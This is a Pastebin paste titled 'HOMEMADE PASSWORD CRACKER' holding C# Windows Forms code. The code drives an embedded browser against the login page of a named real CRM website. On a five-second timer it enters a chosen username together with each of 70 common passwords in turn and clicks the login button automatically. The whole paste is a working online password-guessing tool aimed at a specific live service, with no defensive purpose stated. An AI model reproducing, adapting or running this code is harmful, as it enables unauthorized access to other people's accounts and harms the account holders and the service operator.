Advertisement
Guest User

HOMEMADE PASSWORD CRACKER - 30 MINS

a guest
Nov 24th, 2017
25
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 3.10 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.ComponentModel;
  4. using System.Data;
  5. using System.Drawing;
  6. using System.Linq;
  7. using System.Text;
  8. using System.Threading.Tasks;
  9. using System.Windows.Forms;
  10.  
  11. namespace Eleadcrm_Password_Cracker1
  12. {
  13.     public partial class Form1 : Form
  14.     {
  15.  
  16.         public string UserName;
  17.         public string[] Password1 = new string[70] { "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "abc123", "football", "monkey", "letmein", "696969", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "pussy", "superman", "fuckyou", "jordan", "7777777", "fuckyou", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "fuckme", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "asshole", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555" };
  18.         public int passcount = 0;
  19.  
  20.         public Form1()
  21.         {
  22.             InitializeComponent();
  23.         }
  24.  
  25.         private void Form1_Load(object sender, EventArgs e)
  26.         {
  27.             UserName = textBox1.Text;
  28.             textBox2.Text = Password1[passcount];
  29.             passcount = 0;
  30.             timer1.Enabled = false;
  31.             timer1.Interval = 5000;
  32.             button2.Enabled = false;
  33.             textBox2.Enabled = false;
  34.         }
  35.  
  36. private void button1_Click(object sender, EventArgs e)
  37.         {
  38.             webBrowser1.Navigate("https://eleadcrm.com/evo2/fresh/login.asp");
  39.             timer1.Interval = 5000;
  40.             timer1.Enabled = true;
  41.             button1.Enabled = false;
  42.             button2.Enabled = true;
  43.             textBox1.Enabled = false;
  44.             UserName = textBox1.Text;
  45.         }
  46.  
  47.         private void button2_Click(object sender, EventArgs e)
  48.         {
  49.             timer1.Interval = 5000;
  50.             timer1.Enabled = false;
  51.             button1.Enabled = true;
  52.             button2.Enabled = false;
  53.             textBox1.Enabled = true;
  54.             passcount = 0;
  55.             UserName = textBox1.Text;
  56.         }
  57.  
  58.         private void timer1_Tick(object sender, EventArgs e)
  59.         {
  60.             UserName = textBox1.Text;
  61.             if (passcount >= 70)
  62.             {
  63.                 timer1.Interval = 5000;
  64.                 timer1.Enabled = false;
  65.                 button1.Enabled = true;
  66.                 button2.Enabled = false;
  67.                 passcount = 0;
  68.             }
  69.             else
  70.             {
  71.                 textBox2.Text = Password1[passcount];
  72.                 webBrowser1.Document.GetElementById("user").SetAttribute("value", UserName);
  73.                 webBrowser1.Document.GetElementById("password").SetAttribute("value", Password1[passcount]);
  74.                 webBrowser1.Document.GetElementById("loginbtn").InvokeMember("Click");
  75.                 passcount = passcount + 1;
  76.             }
  77.         }
  78.     }
  79. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement